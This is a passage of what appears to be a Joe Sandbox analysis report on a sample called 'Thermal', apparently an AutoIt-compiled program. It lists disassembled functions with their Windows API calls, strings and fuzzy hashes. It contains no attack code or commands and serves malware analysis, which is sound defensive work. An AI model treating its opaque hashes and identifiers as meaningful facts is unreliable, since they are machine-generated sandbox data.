                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 4f3e4f1401bf856ff0e5fcb75821b860d0a9ecd7e876d2b3944cc7809e9deda1
                                                      • Instruction ID: ac55e2ec730683f2f6443807ad5a8a7e09f88b281dd56632d802104f2826c111
                                                      • Opcode Fuzzy Hash: 4f3e4f1401bf856ff0e5fcb75821b860d0a9ecd7e876d2b3944cc7809e9deda1
                                                      • Instruction Fuzzy Hash: 7A31E631600205ABEB24EF58C889FAEBBBAEF05F50F1C4019E9A5A71A1D7709B44CF50
                                                      APIs
                                                      • __snwprintf.LIBCMT ref: 00194132
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __snwprintf_memmove
                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                      • API String ID: 3506404897-2584243854
                                                      • Opcode ID: e58097dd2300c4a27884d395f45224b7a1f027a01f04f8dab10efcec819a58c3
                                                      • Instruction ID: b9d58a4a4b7d14c6c495af325475a63a4a022238ee933023a0f72ecb349820b2
                                                      • Opcode Fuzzy Hash: e58097dd2300c4a27884d395f45224b7a1f027a01f04f8dab10efcec819a58c3
                                                      • Instruction Fuzzy Hash: 4721A271A0021CABCF15EFA4C891EEE77B5EF64744F404465F905A7281DB30EA46DBA1
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001A6D86
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001A6D91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: 32083737472ac20236bcc926c5f83d8f2bb9a3fc721bc12e639421b8818838b8
                                                      • Instruction ID: 65ec08c7d6c44e58ba7fac45f1af5076d707167c2bffb46bdf106e8cf4db1129
                                                      • Opcode Fuzzy Hash: 32083737472ac20236bcc926c5f83d8f2bb9a3fc721bc12e639421b8818838b8
                                                      • Instruction Fuzzy Hash: 1911C475310208BFEF118F94DC81EFB3B6BEB993A4F154129F9549B290D7319C5087A0
                                                      APIs
                                                        • Part of subcall function 00122111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0012214F
                                                        • Part of subcall function 00122111: GetStockObject.GDI32(00000011), ref: 00122163
                                                        • Part of subcall function 00122111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0012216D
                                                      • GetWindowRect.USER32(00000000,?), ref: 001A7296
                                                      • GetSysColor.USER32(00000012), ref: 001A72B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: 28ef939c105f48884a2ae6e38d8a7990a5b3ae0184478124a39e773241c6a709
                                                      • Instruction ID: e4433c04ae3043ab639a4ccd5a56dcd3162d687ede0fee7443cb08ccbd257fed
                                                      • Opcode Fuzzy Hash: 28ef939c105f48884a2ae6e38d8a7990a5b3ae0184478124a39e773241c6a709
                                                      • Instruction Fuzzy Hash: 0321597661420AAFDB05DFB8CC45EFA7BA8EB49314F004619FD55D3290E734E8A0DB50
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 001A6FC7
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001A6FD6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 280f28f984d852003125ab5418f79cab5158f059da4e277b094fc31c8d973428
                                                      • Instruction ID: 22a032729fb2ffb65217ff381bad3af4f71ae0e01084a614de055c0e647983b2
                                                      • Opcode Fuzzy Hash: 280f28f984d852003125ab5418f79cab5158f059da4e277b094fc31c8d973428
                                                      • Instruction Fuzzy Hash: EC116A79500208AFEB119E74ECA4EFB3B6AEB06368F144714FA64D71E0C735DC909B60
                                                      APIs
                                                      • _memset.LIBCMT ref: 001831C9
                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001831E8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: a6de7446acb1b18a0fcb4d0c436d333b4f1d4fcb1b5be98f62864b383a7329db
                                                      • Instruction ID: e13c3952ffdbd2b4a840837d3b24d9214ebf269746d050cde802b91fc9590a8f
                                                      • Opcode Fuzzy Hash: a6de7446acb1b18a0fcb4d0c436d333b4f1d4fcb1b5be98f62864b383a7329db
                                                      • Instruction Fuzzy Hash: 3711E231901114ABEB24FA98DC49BADB7B9AB15F10F1D0125E825A72A0DB70AF06CF91
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001928F8
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00192921
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: ed205861d918ae2f73187fdc50353c5cd429096528faf0c76304124a48ba34ad
                                                      • Instruction ID: 4bdd426952425d3bde4fa20adf2e6ebe406309fd9a98475f72a6b670ae16c672
                                                      • Opcode Fuzzy Hash: ed205861d918ae2f73187fdc50353c5cd429096528faf0c76304124a48ba34ad
                                                      • Instruction Fuzzy Hash: 6911C270501325BAEF298F518C89EFBFBACFF06755F10822AF54556100E7706994D6F0
                                                      APIs
                                                        • Part of subcall function 001986E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0019849D,?,00000000,?,?), ref: 001986F7
                                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001984A0
                                                      • htons.WSOCK32(00000000,?,00000000), ref: 001984DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 2496851823-2422070025
                                                      • Opcode ID: 1f31b57e542fe4e3e519d158d335f234f5db8bfb5879c751e9b9416922d408a4
                                                      • Instruction ID: 155669998d6b6d694db668a9913897442799437cf63281474e8dd51f2fe75225
                                                      • Opcode Fuzzy Hash: 1f31b57e542fe4e3e519d158d335f234f5db8bfb5879c751e9b9416922d408a4
                                                      • Instruction Fuzzy Hash: F011A17560420AABDF14AF64CC46FEEB768FF15320F10861AF915972D2DB71B810C795
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 0017B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0017B7BD
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00179A2B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: ecf4ce5eedd00f13e4d3bca489b44bb569a5410b0bea345eabc7a444b9deb32e
                                                      • Instruction ID: d303fdb6f4f3cfee9cde54a1f547fd9a6c444523f92f89299329415abc10af23
                                                      • Opcode Fuzzy Hash: ecf4ce5eedd00f13e4d3bca489b44bb569a5410b0bea345eabc7a444b9deb32e
                                                      • Instruction Fuzzy Hash: CA01B571A42224BBCF18EBA4CC51DFE7779AF66320F104719F865573D1DB3059089650
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_memmove
                                                      • String ID: EA06
                                                      • API String ID: 1988441806-3962188686
                                                      • Opcode ID: 0ce28e51912f6ee1662578bff84ec4ca1410645e584e21fb2e42f6594f401a9a
                                                      • Instruction ID: 136fcaf2a217b1c0d6a3c6190d25ee48c33c9fc21bdb982ad07f9de0cdf36a4d
                                                      • Opcode Fuzzy Hash: 0ce28e51912f6ee1662578bff84ec4ca1410645e584e21fb2e42f6594f401a9a
                                                      • Instruction Fuzzy Hash: 2B01F9729042587EDB18C6A8C856EBE7BF89B11301F04419AF553D2281E674A6048B60
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 0017B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0017B7BD
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00179923
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: cbbdcc6ef31ac14061aa09fb8b48c205ea2dabc52ba68438dc23782d96b8050c
                                                      • Instruction ID: 17d58ab3871e1beb22be789b4b16ea8838e5cacb60b421ca05719b461bba508f
                                                      • Opcode Fuzzy Hash: cbbdcc6ef31ac14061aa09fb8b48c205ea2dabc52ba68438dc23782d96b8050c
                                                      • Instruction Fuzzy Hash: 5201D6B2A821087BDF18EBA0C952EFF77BD9F25340F14411AB946A32C1DB105F0C96B1
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 0017B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0017B7BD
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 001799A6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: a2425ec3ea5f3c641bb3ea2f05ad8bc9189b73f553777d2df86135871f6ac7a0
                                                      • Instruction ID: 12e0058a8609a1dde46b20a8dfaf7f1790900acc4b3f9f7f0d1071e0fc458ac7
                                                      • Opcode Fuzzy Hash: a2425ec3ea5f3c641bb3ea2f05ad8bc9189b73f553777d2df86135871f6ac7a0
                                                      • Instruction Fuzzy Hash: 2C01D6B2A4610877DF14EBA4C952EFF77BC9F21340F50411AB989A3281DB245F0C96B1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp
                                                      • String ID: #32770
                                                      • API String ID: 2292705959-463685578
                                                      • Opcode ID: 37c56c50912a089bbaab7eaa776fdb823b7bb5ba5efad0b1643c35214ad22d98
                                                      • Instruction ID: 61f1595dfcb9efa4da341155d1be6a53265f22952c397bfba267149bdbc0c442
                                                      • Opcode Fuzzy Hash: 37c56c50912a089bbaab7eaa776fdb823b7bb5ba5efad0b1643c35214ad22d98
                                                      • Instruction Fuzzy Hash: F2E068336002282BD320AA99AC49FABFBECEB18771F000157FC04D7051EF60AA408BE0
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001788A0
                                                        • Part of subcall function 00143588: _doexit.LIBCMT ref: 00143592
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Message_doexit
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 1993061046-4017498283
                                                      • Opcode ID: 8c7d3ed4b2e9a8a8fdedd0c53a591cc7764601ff7934fc1f415fba35f9d7ccfa
                                                      • Instruction ID: e1b59623132611badb7805142616147e5e76df9365aa9e802f92e2f410e90d20
                                                      • Opcode Fuzzy Hash: 8c7d3ed4b2e9a8a8fdedd0c53a591cc7764601ff7934fc1f415fba35f9d7ccfa
                                                      • Instruction Fuzzy Hash: 55D05B3138535832D21572E46D0BFCA7B488F19B51F044426FB08A55D38BD595D042D5
                                                      APIs
                                                        • Part of subcall function 0015B544: _memset.LIBCMT ref: 0015B551
                                                        • Part of subcall function 00140B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0015B520,?,?,?,0012100A), ref: 00140B79
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0012100A), ref: 0015B524
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0012100A), ref: 0015B533
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0015B52E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 3158253471-631824599
                                                      • Opcode ID: 5f6273b61b817f8db5590d5f241383affe6a6392ba67f476ecc34e57a0fe2775
                                                      • Instruction ID: 9bc735918f653d4d5e478b309cb12d26c6ca9327fb93050c6fa8de75e27ef52f
                                                      • Opcode Fuzzy Hash: 5f6273b61b817f8db5590d5f241383affe6a6392ba67f476ecc34e57a0fe2775
                                                      • Instruction Fuzzy Hash: 37E09270204311CFD3219F75E548B467AE0AF18345F048A5DE866CB751EBB4D588CBA1
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00160091
                                                        • Part of subcall function 0019C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0016027A,?), ref: 0019C6E7
                                                        • Part of subcall function 0019C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0019C6F9
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00160289
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                      • String ID: WIN_XPe
                                                      • API String ID: 582185067-3257408948
                                                      • Opcode ID: 9b13b4686324675040c9c1d9493b3bb17a65b3e6dcb8890b2ea35757354806d2
                                                      • Instruction ID: 1ead1ec5379a9705ae0f8fb4529665b4127ff1842a68a62b868d7d39cc64f773
                                                      • Opcode Fuzzy Hash: 9b13b4686324675040c9c1d9493b3bb17a65b3e6dcb8890b2ea35757354806d2
                                                      • Instruction Fuzzy Hash: 17F0C971805109DFCB1ADBA4CD98BEEBBB8AB0C340F241085F146B6590CB714F94DF21